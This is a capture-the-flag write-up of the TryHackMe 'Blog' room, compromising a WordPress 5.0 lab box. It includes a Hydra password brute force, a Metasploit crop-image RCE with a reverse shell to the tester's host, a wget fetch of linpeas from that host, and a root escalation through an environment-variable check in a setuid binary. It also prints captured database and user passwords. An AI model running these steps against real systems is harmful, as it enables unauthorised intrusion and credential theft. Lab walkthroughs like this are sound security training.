TryHackMe: Blog

TryHackMe: Blog https://tryhackme.com/room/blog

Enumertaion

Lets fire up nmap

$ nmap -sC -sV -oA blog blog -A -vvv
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-01 20:39 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:39
Completed NSE at 20:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:39
Completed NSE at 20:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:39
Completed NSE at 20:39, 0.00s elapsed
Initiating Ping Scan at 20:39
Scanning blog (10.10.63.238) [2 ports]
Completed Ping Scan at 20:39, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 20:39
Scanning blog (10.10.63.238) [1000 ports]
Discovered open port 22/tcp on 10.10.63.238
Discovered open port 139/tcp on 10.10.63.238
Discovered open port 445/tcp on 10.10.63.238
Discovered open port 80/tcp on 10.10.63.238
Completed Connect Scan at 20:39, 0.62s elapsed (1000 total ports)
Initiating Service scan at 20:39
Scanning 4 services on blog (10.10.63.238)
Completed Service scan at 20:40, 13.29s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.63.238.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:40
Completed NSE at 20:40, 1.79s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:40
Completed NSE at 20:40, 0.20s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:40
Completed NSE at 20:40, 0.00s elapsed
Nmap scan report for blog (10.10.63.238)
Host is up, received syn-ack (0.035s latency).
Scanned at 2020-11-01 20:39:57 GMT for 16s
Not shown: 996 closed ports
Reason: 996 conn-refused
PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI=
|   256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8
80/tcp  open  http        syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: -1s
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BLOG<00>             Flags: <unique><active>
|   BLOG<03>             Flags: <unique><active>
|   BLOG<20>             Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55363/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 15489/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 64622/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20121/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2020-11-01T20:40:11+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-01T20:40:11
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:40
Completed NSE at 20:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:40
Completed NSE at 20:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:40
Completed NSE at 20:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.77 seconds

Jumping to http://blog reveals that wordpress is setup as blog.thm so alter local hosts to reference this so that all the blog works correctly. As it is wordpress lets break out wpscan

$ wpscan --url http://blog.thm -e ap,vt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.9
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.thm/ [10.10.63.238]
[+] Started: Sun Nov  1 21:07:49 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
 |  - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:04 <=============================================> (330 / 330) 100.00% Time: 00:00:04
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov  1 21:07:58 2020
[+] Requests Done: 333
[+] Cached Requests: 36
[+] Data Sent: 75.208 KB
[+] Data Received: 238.312 KB
[+] Memory used: 197.781 MB
[+] Elapsed time: 00:00:09

OK, so running version 5.0 which has some issues. So lets take a look at what we can do.

$ searchsploit wordpress 5.0
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
WordPress Core 5.0 - Remote Code Execution                                                 | php/webapps/46511.js
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)                                | php/remote/46662.rb
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts                    | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                                    | php/dos/47800.py
WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion                               | php/webapps/17119.txt
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)                | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities                        | php/webapps/39553.txt
WordPress Plugin FeedWordPress 2015.0426 - SQL Injection                                   | php/webapps/37067.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                                  | php/webapps/44943.txt
WordPress Plugin leenk.me 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting        | php/webapps/39704.txt
WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload                  | php/webapps/18988.php
WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting           | php/webapps/37174.txt
WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary Fi | php/webapps/37353.php
WordPress Plugin Quick Page/Post Redirect 5.0.3 - Multiple Vulnerabilities                 | php/webapps/32867.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                                | php/webapps/48918.sh
WordPress Plugin WP-Property 1.35.0 - Arbitrary File Upload                                | php/webapps/18987.php
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Ok so lets copy and take a look at php/webapps/46511.js

$ searchsploit -m php/webapps/46511.js
  Exploit: WordPress Core 5.0 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46511
     Path: /usr/share/exploitdb/exploits/php/webapps/46511.js
File Type: ASCII text, with very long lines, with CRLF line terminators

Copied to: /home/tj/pentest/ctfs/blog/46511.js

That is just a javascript file :( Let see what we can find with google ... we find the below 2 CVE's which releate to the above but we need to be an author. Using -e u on wpscan lets find out what users are on the site.

CVE-2019-8943 Detail
Current Description

WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
CVE-2019-8942 Detail
Current Description

WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943.
[i] User(s) Identified:

[+] kwheel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bjoel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

lets try using Hydra on the users above......

$ hydra -l kwheel -P /usr/share/wordlists/rockyou.txt 10.10.63.238 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:F=The password you entered for the username' -v
...
...
...
...
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "redhot" - 3174 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "poodle" - 3175 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "lebron23" - 3176 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "dollar" - 3177 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "chino" - 3178 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "aguilar" - 3179 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.63.238 - login "kwheel" - pass "66666" - 3180 of 14344399 [child 7] (0/0)
[80][http-post-form] host: 10.10.63.238   login: kwheel   password: **[REDACTED]**
[STATUS] attack finished for 10.10.63.238 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-01 21:54:44

Ok, we have the password and we are in to /wp-admin

Ok, we are not an admin but an author which is what we need for the two CVE's above. There does seem to be a metasploit module so lets try that ...

Metasploit tip: Use help <command> to learn more about any command

msf5 > search CVE-2019-8943

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_crop_rce  2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload


msf5 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(multi/http/wp_crop_rce) > options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.72     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf5 exploit(multi/http/wp_crop_rce) > set PASSWORD **[REDACTED]**
PASSWORD => cutiepie
msf5 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf5 exploit(multi/http/wp_crop_rce) > set RHOSTS blog.thm
RHOSTS => blog.thm
msf5 exploit(multi/http/wp_crop_rce) > set LHOST 10.9.5.198
LHOST => 10.9.5.198
msf5 exploit(multi/http/wp_crop_rce) > options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   **[REDACTED]**        yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.63.238     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME   kwheel           yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.5.198       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf5 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 10.9.5.198:4444 
[*] Authenticating with WordPress using kwheel:**[REDACTED]**...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38288 bytes) to 10.10.63.238
[*] Meterpreter session 1 opened (10.9.5.198:4444 -> 10.10.63.238:43266) at 2020-11-01 22:08:03 +0000


[*] Attempting to clean up files...


meterpreter > 

BOOM We have a shell. Lets see if the user.txt flag is under home ...

ls /home/
bjoel
ls /home/bjoel
Billy_Joel_Termination_May20-2020.pdf
user.txt
cat /home/bjoel/user.txt
You won't find what you're looking for here.

TRY HARDER

Linpeas.sh

Damn, O'well lets keep looking.... Lets copy across linpeas.sh and run it to look for any privesc

www-data@blog:/tmp$ wget http://10.9.5.198:8000/linpeas.sh -O linpeas.sh                                                 
wget http://10.9.5.198:8000/linpeas.sh -O linpeas.sh
--2020-11-01 22:16:06--  http://10.9.5.198:8000/linpeas.sh
Connecting to 10.9.5.198:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223835 (219K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 218.59K  1.34MB/s    in 0.2s    

2020-11-01 22:16:06 (1.34 MB/s) - 'linpeas.sh' saved [223835/223835]

www-data@blog:/tmp$ sh lin
sh linpeas.sh 
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version                                                 
Sudo version 1.8.21p2       
                                                                                                                             
[+] Looking for Wordpress wp-config.php files
wp-config.php files found:                                                                                                   
/var/www/wordpress/wp-config.php
define('DB_NAME', 'blog');
define('DB_USER', 'wordpressuser');
define('DB_PASSWORD', 'LittleYellowLamp90!@');
define('DB_HOST', 'localhost');
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                         
/usr/bin/chage 
[+] Backup files?
-rw-r----- 1 www-data www-data 235 May 28 03:44 /var/www/wordpress/.htaccess_backup  

Ok so /usr/bin/chage looks out of place , lets take a look at it

www-data@blog:/tmp$ ls -l /usr/bin/chage 
ls -l /usr/bin/chage 
-rwxr-sr-x 1 root shadow 71816 Mar 22  2019 /usr/bin/chage
www-data@blog:/tmp$ file /usr/bin/chage
file /usr/bin/chage
/usr/bin/chage: setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a7b96853521574fb74cf960b271e3b64e6b0b6f8, stripped
www-data@blog:/tmp$ /usr/bin/chage --help
/usr/bin/chage --help
Usage: chage [options] LOGIN

Options:
  -d, --lastday LAST_DAY        set date of last password change to LAST_DAY
  -E, --expiredate EXPIRE_DATE  set account expiration date to EXPIRE_DATE
  -h, --help                    display this help message and exit
  -I, --inactive INACTIVE       set password inactive after expiration
                                to INACTIVE
  -l, --list                    show account aging information
  -m, --mindays MIN_DAYS        set minimum number of days before password
                                change to MIN_DAYS
  -M, --maxdays MAX_DAYS        set maximim number of days before password
                                change to MAX_DAYS
  -R, --root CHROOT_DIR         directory to chroot into
  -W, --warndays WARN_DAYS      set expiration warning days to WARN_DAYS

Playing about with that gets me no where, checking back through the SUID binaries I then spot checker which looks odd again

[+] SUID - Check easy privesc, exploits and write perms                                                                      
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                         
/usr/bin/passwd         --->    Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)      
/usr/bin/newgrp         --->    HP-UX_10.20
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec         --->    Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/chfn           --->    SuSE_9.3/10
/usr/bin/sudo           --->    /sudo$
/usr/bin/at             --->    RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/sbin/checker
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

Lets take a look at it

www-data@blog:/tmp$ file /usr/sbin/checker
file /usr/sbin/checker
/usr/sbin/checker: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6cdb17533a6e02b838336bfe9791b5d57e1e2eea, not stripped
www-data@blog:/tmp$ /usr/sbin/checker
/usr/sbin/checker
Not an Admin

Ok so it says we are not an admin, lets see if we can use strings to see what it is chekcing

$ strings /usr/sbin/checker
strings /usr/sbin/checker
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
puts
getenv
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
=9       
AWAVI
AUATL
[]A\A]A^A_
admin
/bin/bash
Not an Admin
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7698
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
checker.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
getenv@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

Looking through before /bin/sh there is admin, what the hell lets try export admin=-1 who knows....

www-data@blog:/tmp$ export admin=1
export admin=1
www-data@blog:/tmp$ checker     
checker
root@blog:/tmp#  id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@blog:/tmp# whoami
whoami
root
root@blog:/tmp# 

Ok..... that was too easy ...... but we appear to be root...

root@blog:/tmp# cd /root    
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
[REDACTED]

Cool, we have the root flag, but still need to find the user flag...

root@blog:/root# find / -iname "user.txt" 2>/dev/null
find / -iname "user.txt" 2>/dev/null
/home/bjoel/user.txt
/media/usb/user.txt

Ok so there is a user.txt under /media/usb lets take a look

root@blog:/root# cat /media/usb/user.txt
cat /media/usb/user.txt
[REDCATED]

Down the rabbit hole.........

I did end up spending allot of time going down the rabbitwhole of the open samba share which lead no nowhere so excluded it from the abobe......

Samba

Install zbar tools to decode QR codes $ sudo apt-get install zbar-tools -y

$ zbarimg check-this.png 
QR-Code:https://qrgo.page.link/M6dE

Hmm we have an URL , lets see where this goes with curl.....

$ curl -v https://qrgo.page.link/M6dE
*   Trying 172.217.169.14:443...
* Connected to qrgo.page.link (172.217.169.14) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=Mountain View; O=Google LLC; CN=*.page.link
*  start date: Oct  6 06:46:43 2020 GMT
*  expire date: Dec 29 06:46:43 2020 GMT
*  subjectAltName: host "qrgo.page.link" matched cert's "*.page.link"
*  issuer: C=US; O=Google Trust Services; CN=GTS CA 1O1
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55cd90151db0)
> GET /M6dE HTTP/2
> Host: qrgo.page.link
> user-agent: curl/7.72.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 302 
< content-type: application/binary
< vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
< cache-control: no-cache, no-store, max-age=0, must-revalidate
< pragma: no-cache
< expires: Mon, 01 Jan 1990 00:00:00 GMT
< date: Sun, 01 Nov 2020 21:02:25 GMT
< location: https://www.youtube.com/watch?v=eFTLKWw542g
< content-security-policy: script-src 'nonce-lrDqKONAyZiZ7mwt36BuJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DurableDeepLinkUi/cspreport;worker-src 'self'
< server: ESF
< content-length: 0
< x-xss-protection: 0
< x-frame-options: SAMEORIGIN
< x-content-type-options: nosniff
< alt-svc: h3-Q050=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
< 
* Connection #0 to host qrgo.page.link left intact

Ok, so its youtube